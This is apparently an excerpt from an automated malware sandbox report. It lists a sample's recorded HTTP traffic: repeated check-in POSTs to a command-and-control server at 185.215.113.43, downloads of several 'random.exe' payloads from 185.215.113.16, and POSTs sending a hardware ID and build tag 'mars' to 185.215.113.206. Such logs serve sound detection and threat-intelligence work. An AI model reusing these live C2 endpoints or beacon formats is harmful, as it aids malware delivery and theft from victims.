Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:34:33 GMTIf-None-Match: "67431d59-1c6200"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008767001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:34:40 GMTIf-None-Match: "67431d60-1b7e00"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008768001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 45 37 39 42 32 46 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 2d 2d 0d 0a Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="hwid"2682E79B2F583419705248------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build"mars------BAEBGHCFCAAFIECAFIII--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:32:47 GMTIf-None-Match: "67431cef-e1000"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008769001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:33:14 GMTIf-None-Match: "67431d0a-2af400"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008770001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 45 37 39 42 32 46 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="hwid"2682E79B2F583419705248------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build"mars------HIDHIEGIIIECAKEBFBAA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
